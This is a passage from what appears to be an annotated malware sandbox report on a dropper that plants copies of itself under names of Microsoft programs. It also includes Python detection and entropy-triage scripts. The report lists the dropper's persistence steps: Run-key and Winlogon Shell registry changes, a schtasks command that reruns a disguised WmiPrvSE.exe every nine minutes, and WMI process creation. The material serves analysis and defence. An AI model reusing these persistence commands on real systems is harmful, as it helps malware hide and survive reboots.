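        # Any path the compiler is given (response file or sources) in a
        # user-writable location is suspicious; build systems compile from
        # project directories.
        if any(is_user_writable(p) for p in WIN_PATH_RE.findall(event["command_line"])):
            hits.append("compiler_input_in_user_writable_path")
    if not in_standard_root(event["parent_image"]):
        hits.append("parent_outside_standard_root")
    if basename(event["parent_image"]) == "wmiprvse.exe":
        # Win32_Process::Create runs the new process under the WMI provider host.
        hits.append("spawned_via_wmiprvse")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> matched rules, for events that matched at least one."""
    findings: Dict[str, List[str]] = {}
    for e in events:
        hits = evaluate(e)
        if hits:
            findings[e["id"]] = hits
    return findings


CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed events, modelled on the command lines in the report.
SAMPLE_EVENTS = [
    {"id": "evt-1", "image": CSC,
     "parent_image": r"C:\msproviderBrokerMonitornet\WinPerfcommon.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"'},
    {"id": "evt-2", "image": CSC,  # benign build: MSBuild compiling a project tree
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\src\app\obj\Release\app.cmdline"'},
    {"id": "evt-3", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r'cmd.exe /c ping 127.0.0.1 -n 5'},
    {"id": "evt-4", "image": r"C:\Windows\System32\cmd.exe",  # benign interactive shell
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe"'},
]


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"{event_id}: {', '.join(rules)}")
```

Run stand-alone it reports evt-1 (compiler input in Temp, parent outside a standard root) and evt-3 (child of WmiPrvSE.exe) and stays quiet on the two benign records. The WmiPrvSE.exe rule is deliberately broad: legitimate management tooling also creates processes through WMI, so in production it is a correlation key (which caller invoked Win32_Process::Create, visible in Microsoft-Windows-WMI-Activity tracing) rather than an alert on its own.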
                                    Source: C:\Users\user\Desktop\top.exe File created: C:\msproviderBrokerMonitornet\__tmp_rar_sfx_access_check_4835625
                                    Source: top.exe Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046F640 push ecx; ret 0_2_0046F653
                                    Source: C:\Users\user\Desktop\top.exe Code function: 0_2_0046EB78 push eax; ret 0_2_0046EB96
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Code function: 6_2_00007FF848F40C0D push ebx; retf 6_2_00007FF848F40C1A
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Code function: 6_2_00007FF849355601 pushad ; retf 6_2_00007FF8493559CD
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Code function: 6_2_00007FF8493559BC pushad ; retf 6_2_00007FF8493559CD
                                    Source: WinPerfcommon.exe.0.dr Static PE information: section name: .text entropy: 7.574103435922908
                                    Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
                                    Source: SystemSettings.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
                                    Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe0.6.dr Static PE information: section name: .text entropy: 7.574103435922908
                                    Source: WmiPrvSE.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
                                    Source: OfficeClickToRun.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
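The six entropy lines above carry two findings at once: a .text entropy of 7.57 bits per byte means the code section is compressed or encrypted rather than plain machine code, and the value being identical to fifteen digits across six differently named files means they are copies of one binary, three of them dropped under the names of legitimate Microsoft programs (SystemSettings.exe, WmiPrvSE.exe, OfficeClickToRun.exe). The following is an added example, not code from the Joe Sandbox report or from the sample, that computes Shannon entropy the way a PE triage tool does, parses these report lines, groups files by identical section entropy and flags the borrowed names. The entropy threshold, the list of Microsoft binary names and the sample byte strings are assumptions made for the example; REPORT_LINES is copied from the report.

```python
"""Added example (not from the Joe Sandbox report or the sample): section
entropy as a packing indicator, and identical entropy as a same-payload
indicator across dropped files.

Shannon entropy H = -sum(p_i * log2 p_i) over byte frequencies is 0 for a
constant buffer and 8 for a uniform one; compiled x86/x64 code usually
sits around 6, compressed or encrypted data above 7.  REPORT_LINES is
copied from the report; the threshold, the Microsoft name list and the
byte strings used for checking are constructed for the example.
"""
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

PACKED_THRESHOLD = 7.0  # assumed heuristic cut-off, bits per byte

# Assumed: names of legitimate Microsoft binaries that droppers like to reuse.
MICROSOFT_BINARY_NAMES = {
    "systemsettings.exe", "wmiprvse.exe", "officeclicktorun.exe",
    "svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe",
}

# Copied from the report's "Static PE information" entries above.
REPORT_LINES = """\
Source: WinPerfcommon.exe.0.dr Static PE information: section name: .text entropy: 7.574103435922908
Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
Source: SystemSettings.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe0.6.dr Static PE information: section name: .text entropy: 7.574103435922908
Source: WmiPrvSE.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
Source: OfficeClickToRun.exe.6.dr Static PE information: section name: .text entropy: 7.574103435922908
"""

# "<name>.<pid>.dr" is Joe Sandbox's label for a file dropped by process <pid>;
# "\s*" tolerates the fused "drStatic" form the HTML export produces.
LINE_RE = re.compile(
    r"Source: (?P<file>.+?)\.(?P<pid>\d+)\.dr\s*Static PE information: "
    r"section name: (?P<section>\S+) entropy: (?P<entropy>[\d.]+)"
)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of `data`: 0.0 for constant input, 8.0 for uniform input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_packed(entropy: float) -> bool:
    return entropy >= PACKED_THRESHOLD


def parse_entropy_lines(text: str) -> List[Dict[str, str]]:
    return [m.groupdict() for m in (LINE_RE.search(l) for l in text.splitlines()) if m]


def group_by_section_entropy(records: List[Dict[str, str]]) -> Dict[Tuple[str, float], List[str]]:
    """Files sharing an identical (section, entropy) pair are the same section bytes."""
    groups: Dict[Tuple[str, float], List[str]] = defaultdict(list)
    for r in records:
        groups[(r["section"], float(r["entropy"]))].append(r["file"])
    return dict(groups)


def canonical_name(dropped_name: str) -> str:
    """Strip the report's duplicate suffix ('...exe0' -> '...exe')."""
    return re.sub(r"(\.exe)\d+$", r"\1", dropped_name, flags=re.IGNORECASE)


def flag_masquerades(files: List[str]) -> List[str]:
    """Dropped files whose name belongs to a legitimate Microsoft binary."""
    return sorted({canonical_name(f) for f in files
                   if canonical_name(f).lower() in MICROSOFT_BINARY_NAMES})


if __name__ == "__main__":
    for (section, entropy), files in group_by_section_entropy(parse_entropy_lines(REPORT_LINES)).items():
        verdict = "packed/encrypted" if is_packed(entropy) else "plain"
        print(f"{section} entropy {entropy:.4f} ({verdict}) shared by {len(files)} files")
        print("  names borrowed from Microsoft binaries:", ", ".join(flag_masquerades(files)))
```

On a real sample, `shannon_entropy` is run over each section's raw bytes (`SizeOfRawData` slice at `PointerToRawData`), not over the whole file, because a high-entropy resource section is common in benign installers while a high-entropy .text section almost never is. Identical entropy is a cheap first pass; the hash of the section bytes is the definitive same-payload check.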

                                    Persistence and Installation Behavior

Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical events)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\qMBWbOkw.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\GOHavRZK.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\ZndYtGLf.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\Qxaqfufs.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\kTYwyifI.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\alFgOGaa.log
Source: C:\Users\user\Desktop\top.exe | File created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\SHwrfMKt.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe

                                    Boot Survival

Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 identical events)
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommon
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVta
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommon

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\top.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
